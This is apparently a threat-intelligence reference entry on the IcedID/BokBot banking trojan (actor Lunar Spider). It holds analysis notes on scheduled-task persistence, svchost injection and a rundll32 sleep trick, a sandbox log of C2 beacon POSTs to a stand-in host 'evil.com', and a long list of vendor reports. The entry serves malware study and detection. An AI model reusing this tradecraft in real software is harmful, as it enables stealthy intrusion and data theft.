| SYMBOL | COMMON_NAME | aka. SYNONYMS |
Actor(s): Lunar Spider
URLhausAnalysis Observations:
* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000
**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
| 2021-09-03 ⋅ Trend Micro ⋅ The State of SSL/TLS Certificate Usage in Malware C&C Communications AdWind ostap AsyncRAT BazarBackdoor BitRAT Buer Chthonic CloudEyE Cobalt Strike DCRat Dridex FindPOS GootKit Gozi IcedID ISFB Nanocore RAT Orcus RAT PandaBanker Qadars QakBot Quasar RAT Rockloader ServHelper Shifu SManager TorrentLocker TrickBot Vawtrak Zeus Zloader |
| 2021-08-05 ⋅ Group-IB ⋅ Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot Buer campoloader Hancitor IcedID QakBot |
| 2021-08-05 ⋅ The Record ⋅ Meet Prometheus, the secret TDS behind some of today’s malware campaigns Buer campoloader IcedID QakBot |
| 2021-07-30 ⋅ HP ⋅ Detecting TA551 domains Valak Dridex IcedID ISFB QakBot |
| 2021-07-26 ⋅ vmware ⋅ Hunting IcedID and unpacking automation with Qiling IcedID |
| 2021-07-23 ⋅ Github (Lastline-Inc) ⋅ YARA rules, IOCs and Scripts for extracting IcedID C2s IcedID |
| 2021-07-19 ⋅ The DFIR Report ⋅ IcedID and Cobalt Strike vs Antivirus Cobalt Strike IcedID |
| 2021-07-14 ⋅ Cerium Networks ⋅ Threat of the Month: IcedID Malware IcedID |
| 2021-07-08 ⋅ vmware ⋅ IcedID: Analysis and Detection IcedID |
| 2021-06-30 ⋅ Cynet ⋅ Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration Conti IcedID |
| 2021-06-24 ⋅ Kaspersky ⋅ Malicious spam campaigns delivering banking Trojans IcedID QakBot |
| 2021-06-24 ⋅ SentinelOne ⋅ Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros IcedID |
| 2021-06-20 ⋅ The DFIR Report ⋅ From Word to Lateral Movement in 1 Hour Cobalt Strike IcedID |
| 2021-06-16 ⋅ Proofpoint ⋅ The First Step: Initial Access Leads to Ransomware BazarBackdoor Egregor IcedID Maze QakBot REvil Ryuk TrickBot WastedLocker |
| 2021-05-29 ⋅ Youtube (AhmedS Kasmani) ⋅ Analysis of ICEID Malware Installer DLL IcedID |
| 2021-05-26 ⋅ Check Point ⋅ Melting Ice – Tracking IcedID Servers with a few simple steps IcedID |
| 2021-05-19 ⋅ Team Cymru ⋅ Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network IcedID |
| 2021-05-18 ⋅ RECON INFOSEC ⋅ An Encounter With TA551/Shathak IcedID |
| 2021-05-17 ⋅ Telekom ⋅ Let’s set ice on fire: Hunting and detecting IcedID infections IcedID |
| 2021-05-17 ⋅ Github (telekom-security) ⋅ icedid_analysis IcedID |
| 2021-05-12 ⋅ Conti Ransomware Cobalt Strike Conti IcedID |
| 2021-05-10 ⋅ MALWATION ⋅ IcedID Malware Technical Analysis Report IcedID |
| 2021-04-19 ⋅ Netresec ⋅ Analysing a malware PCAP with IcedID and Cobalt Strike traffic Cobalt Strike IcedID |
| 2021-04-17 ⋅ YouTube (Worcester DEFCON Group) ⋅ Inside IcedID: Anatomy Of An Infostealer IcedID |
| 2021-04-12 ⋅ Trend Micro ⋅ A Spike in BazarCall and IcedID Activity Detected in March BazarBackdoor IcedID |
| 2021-04-11 ⋅ 4rchibld ⋅ IcedID on my neck I’m the coolest IcedID |
| 2021-04-10 ⋅ Youtube (AhmedS Kasmani) ⋅ Malware Analysis: IcedID Banking Trojan JavaScript Dropper IcedID |
| 2021-04-09 ⋅ Microsoft ⋅ Investigating a unique “form” of email delivery for IcedID malware IcedID |
| 2021-04-09 ⋅ aaqeel01 ⋅ IcedID Analysis IcedID |
| 2021-04-07 ⋅ Minerva ⋅ IcedID - A New Threat In Office Attachments IcedID |
| 2021-04-07 ⋅ Uptycs ⋅ IcedID campaign spotted being spiced with Excel 4 Macros IcedID |
| 2021-04-01 ⋅ Reversing Labs ⋅ Code Reuse Across Packers and DLL Loaders IcedID SystemBC |
| 2021-03-31 ⋅ Red Canary ⋅ 2021 Threat Detection Report Shlayer Andromeda Cobalt Strike Dridex Emotet IcedID MimiKatz QakBot TrickBot |
| 2021-03-29 ⋅ The DFIR Report ⋅ Sodinokibi (aka REvil) Ransomware Cobalt Strike IcedID REvil |
| 2021-03-12 ⋅ Binary Defense ⋅ IcedID GZIPLOADER Analysis IcedID |
| 2021-03-04 ⋅ F5 ⋅ IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims IcedID |
| 2021-03 ⋅ Group-IB ⋅ Ransomware Uncovered 2020/2021 RansomEXX BazarBackdoor Buer Clop Conti DoppelPaymer Dridex Egregor IcedID Maze PwndLocker QakBot RansomEXX REvil Ryuk SDBbot TrickBot Zloader |
| 2021-02-26 ⋅ CrowdStrike ⋅ Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact DarkSide RansomEXX Griffon Carbanak Cobalt Strike DarkSide IcedID MimiKatz PyXie RansomEXX REvil |
| 2021-02-25 ⋅ FireEye ⋅ So Unchill: Melting UNC2198 ICEDID to Ransomware Operations MOUSEISLAND Cobalt Strike Egregor IcedID Maze SystemBC |
| 2021-02-23 ⋅ CrowdStrike ⋅ 2021 Global Threat Report RansomEXX Amadey Anchor Avaddon BazarBackdoor Clop Cobalt Strike Conti Cutwail DanaBot DarkSide DoppelPaymer Dridex Egregor Emotet Hakbit IcedID JSOutProx KerrDown LockBit Mailto Maze MedusaLocker Mespinoza Mount Locker NedDnLoader Nemty Pay2Key PlugX Pushdo PwndLocker PyXie QakBot Quasar RAT RagnarLocker Ragnarok RansomEXX REvil Ryuk Sekhmet ShadowPad SmokeLoader Snake SUNBURST SunCrypt TEARDROP TrickBot WastedLocker Winnti Zloader KNOCKOUT SPIDER OUTLAW SPIDER RIDDLE SPIDER SOLAR SPIDER VIKING SPIDER |
| 2021-02-03 ⋅ TA551/Shathak Threat Research IcedID |
| 2021-02-02 ⋅ CRONUP ⋅ De ataque con Malware a incidente de Ransomware Avaddon BazarBackdoor Buer Clop Cobalt Strike Conti DanaBot Dharma Dridex Egregor Emotet Empire Downloader FriedEx GootKit IcedID MegaCortex Nemty Phorpiex PwndLocker PyXie QakBot RansomEXX REvil Ryuk SDBbot SmokeLoader TrickBot Zloader |
| 2021-01-19 ⋅ Palo Alto Networks Unit 42 ⋅ Wireshark Tutorial: Examining Emotet Infection Traffic Emotet GootKit IcedID QakBot TrickBot |
| 2021-01-19 ⋅ Medium elis531989 ⋅ Funtastic Packers And Where To Find Them Get2 IcedID QakBot |
| 2021-01-18 ⋅ tccontre Blog ⋅ Extracting Shellcode in ICEID .PNG Steganography IcedID |
| 2021-01-09 ⋅ Marco Ramilli's Blog ⋅ Command and Control Traffic Patterns ostap LaZagne Agent Tesla Azorult Buer Cobalt Strike DanaBot DarkComet Dridex Emotet Formbook IcedID ISFB NetWire RC PlugX Quasar RAT SmokeLoader TrickBot |
| 2021-01-07 ⋅ Palo Alto Networks Unit 42 ⋅ TA551: Email Attack Campaign Switches from Valak to IcedID IcedID |
| 2020-12-10 ⋅ NRI SECURE ⋅ マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説 IcedID |
| 2020-12-09 ⋅ Cisco ⋅ Quarterly Report: Incident Response trends from Fall 2020 Cobalt Strike IcedID Maze RansomEXX Ryuk |
| 2020-12-09 ⋅ Microsoft ⋅ EDR in block mode stops IcedID cold IcedID |
| 2020-12-02 ⋅ CyberInt ⋅ IcedID Stealer Man-in-the-browser Banking Trojan IcedID |
| 2020-11-26 ⋅ Cybereason ⋅ Cybereason vs. Egregor Ransomware Cobalt Strike Egregor IcedID ISFB QakBot |
| 2020-09-29 ⋅ Microsoft ⋅ Microsoft Digital Defense Report Emotet IcedID Mailto Maze QakBot REvil RobinHood TrickBot |
| 2020-08-16 ⋅ kienmanowar Blog ⋅ Manual Unpacking IcedID Write-up IcedID |
| 2020-08-12 ⋅ Juniper ⋅ IcedID Campaign Strikes Back IcedID |
| 2020-08-10 ⋅ tccontre Blog ⋅ Learning From ICEID loader - Including its Steganography Payload Parsing IcedID |
| 2020-07-30 ⋅ Spamhaus ⋅ Spamhaus Botnet Threat Update Q2 2020 AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader |
| 2020-07-01 ⋅ Cisco Talos ⋅ Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks Valak IcedID ISFB MyKings Spreader |
| 2020-06-22 ⋅ zero2auto ⋅ Unpacking Visual Basic Packers – IcedID IcedID |
| 2020-06-18 ⋅ Juniper ⋅ COVID-19 and FMLA Campaigns used to install new IcedID banking malware IcedID |
| 2020-06-17 ⋅ Github (f0wl) ⋅ deICEr: A Go tool for extracting config from IcedID second stage Loaders IcedID |
| 2020-05-29 ⋅ Group-IB ⋅ IcedID: When ice burns through bank accounts IcedID |
| 2020-03-04 ⋅ CrowdStrike ⋅ 2020 CrowdStrike Global Threat Report MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelDridex DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot vidar Winnti ANTHROPOID SPIDER APT31 APT39 BlackTech BuhTrap Charming Kitten CLOCKWORK SPIDER DOPPEL SPIDER FIN7 Gamaredon Group Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER PINCHY SPIDER Pirate Panda SALTY SPIDER SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER |
| 2020-02-18 ⋅ Sophos Labs ⋅ Nearly a quarter of malware now communicates using TLS Dridex IcedID TrickBot |
| 2020-01-22 ⋅ The malware analyst’s guide to PE timestamps Azorult Gozi IcedID ISFB LOLSnif SUNBURST TEARDROP |
| 2020 ⋅ Secureworks ⋅ GOLD SWATHMORE GlobeImposter Gozi IcedID TrickBot LUNAR SPIDER |
| 2019-12-18 ⋅ Github (psrok1) ⋅ IcedID PNG Extractor IcedID |
| 2019-12-12 ⋅ FireEye ⋅ Cyber Threat Landscape in Japan – Revealing Threat in the Shadow Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech |
| 2019-12-03 ⋅ Malwarebytes ⋅ New version of IcedID Trojan uses steganographic payloads IcedID |
| 2019-07-09 ⋅ Fortinet ⋅ A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection IcedID |
| 2019-06-25 ⋅ IcedID aka #Bokbot Analysis with Ghidra IcedID |
| 2019-06-16 ⋅ Fortinet ⋅ A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process) IcedID |
| 2019-04-04 ⋅ SecurityIntelligence ⋅ IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth IcedID |
| 2019-03-21 ⋅ CrowdStrike ⋅ Interception: Dissecting BokBot’s “Man in the Browser” IcedID |
| 2019-02-15 ⋅ CrowdStrike ⋅ “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web Dyre IcedID TrickBot Vawtrak LUNAR SPIDER WIZARD SPIDER |
| 2019-02-06 ⋅ SecurityIntelligence ⋅ IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites IcedID |
| 2019-01-03 ⋅ CrowdStrike ⋅ Digging into BokBot’s Core Module IcedID |
| 2018-11-09 ⋅ Youtube (OALabs) ⋅ Reverse Engineering IcedID / Bokbot Malware Part 2 IcedID |
| 2018-10-26 ⋅ Youtube (OALabs) ⋅ Unpacking Bokbot / IcedID Malware - Part 1 IcedID |
| 2018-09-07 ⋅ Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1 IcedID |
| 2018-08-09 ⋅ Fox-IT ⋅ Bokbot: The (re)birth of a banker IcedID Vawtrak |
| 2018-04-10 ⋅ Cisco Talos ⋅ IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution IcedID |
| 2017-11-14 ⋅ Digital Guardian ⋅ IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites IcedID |
| 2017-11-13 ⋅ SecurityIntelligence ⋅ New Banking Trojan IcedID Discovered by IBM X-Force Research IcedID IcedID Downloader |
| 2017-11-13 ⋅ Intezer ⋅ IcedID Banking Trojan Shares Code with Pony 2.0 Trojan IcedID IcedID Downloader |